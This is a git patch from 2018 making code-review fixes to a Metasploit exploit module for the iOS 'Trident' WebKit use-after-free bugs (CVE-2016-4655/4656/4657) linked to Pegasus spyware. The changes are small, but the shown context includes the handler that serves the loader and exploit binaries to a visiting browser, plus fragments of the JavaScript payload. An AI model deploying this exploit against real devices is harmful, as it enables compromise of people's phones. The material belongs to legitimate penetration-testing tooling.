From 50300426cae94de1e941c5a2a76be454fc1af4c6 Mon Sep 17 00:00:00 2001
From: Tim W <timrlw@gmail.com>
Date: Thu, 3 May 2018 18:21:07 +0800
Subject: [PATCH] fix feedback from code review

---
 .../apple_ios/browser/webkit_trident.rb       | 21 +++++++++----------
 1 file changed, 10 insertions(+), 11 deletions(-)

diff --git a/modules/exploits/apple_ios/browser/webkit_trident.rb b/modules/exploits/apple_ios/browser/webkit_trident.rb
index 6e666c3f99..f18e0c519b 100644
--- a/modules/exploits/apple_ios/browser/webkit_trident.rb
+++ b/modules/exploits/apple_ios/browser/webkit_trident.rb
@@ -1,10 +1,10 @@
 ##
-# This module requires Metasploit: http://metasploit.com/download
+# This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
 class MetasploitModule < Msf::Exploit::Remote
-  Rank = ExcellentRanking
+  Rank = ManualRanking
 
   include Msf::Exploit::Remote::HttpServer::HTML
 
@@ -15,7 +15,7 @@ class MetasploitModule < Msf::Exploit::Remote
           This module exploits a UAF vulnerability in WebKit's JavaScriptCore library.
       },
       'License'        => MSF_LICENSE,
-      'Author'        => [
+      'Author'         => [
         'qwertyoruiop', # jbme.qwertyoruiop.com
         'siguza',       # PhoenixNonce
         'tihmstar',     # PhoenixNonce
@@ -25,10 +25,13 @@ class MetasploitModule < Msf::Exploit::Remote
           ['CVE', '2016-4655'],
           ['CVE', '2016-4656'],
           ['CVE', '2016-4657'],
+          ['BID', '92651'],
+          ['BID', '92652'],
+          ['BID', '92653'],
           ['URL', 'https://blog.lookout.com/trident-pegasus'],
           ['URL', 'https://citizenlab.ca/2016/08/million-dollar-dissident-iphone-zero-day-nso-group-uae/'],
           ['URL', 'https://www.blackhat.com/docs/eu-16/materials/eu-16-Bazaliy-Mobile-Espionage-in-the-Wild-Pegasus-and-Nation-State-Level-Attacks.pdf'],
-          ['URL', 'https://github.com/Siguza/PhoenixNonce.git'],
+          ['URL', 'https://github.com/Siguza/PhoenixNonce'],
           ['URL', 'https://jndok.github.io/2016/10/04/pegasus-writeup/'],
           ['URL', 'https://sektioneins.de/en/blog/16-09-02-pegasus-ios-kernel-vulnerability-explained.html'],
         ],
@@ -46,13 +49,13 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def on_request_uri(cli, request)
     print_status("Request from #{request['User-Agent']}")
-    if request.uri =~ /\/loader$/
+    if request.uri =~ %r{/loader$}
       print_good("Target is vulnerable.")
       local_file = File.join( Msf::Config.data_directory, "exploits", "CVE-2016-4655", "loader" )
       loader_data = File.read(local_file, {:mode => 'rb'})
       send_response(cli, loader_data, {'Content-Type'=>'application/octet-stream'})
       return
-    elsif request.uri =~ /\/exploit$/
+    elsif request.uri =~ %r{/exploit$}
       local_file = File.join( Msf::Config.data_directory, "exploits", "CVE-2016-4655", "exploit" )
       loader_data = File.read(local_file, {:mode => 'rb'})
       send_response(cli, loader_data, {'Content-Type'=>'application/octet-stream'})
@@ -66,11 +69,8 @@ class MetasploitModule < Msf::Exploit::Remote
  function load_binary_resource(url) {
    var req = new XMLHttpRequest();
    req.open('GET', url, false);
-   req.overrideMimeType('text\/plain; charset=x-user-defined');
+   req.overrideMimeType('text/plain; charset=x-user-defined');
    req.send(null);
-   if (req.status != 200) {
-     document.write("fail downloading loader");
-   };
    return req.responseText;
  }
  var mem0 = 0;
@@ -189,7 +189,6 @@ class MetasploitModule < Msf::Exploit::Remote
    }
   }
   fc();
-  alert(2);
  }
 
  function go_() {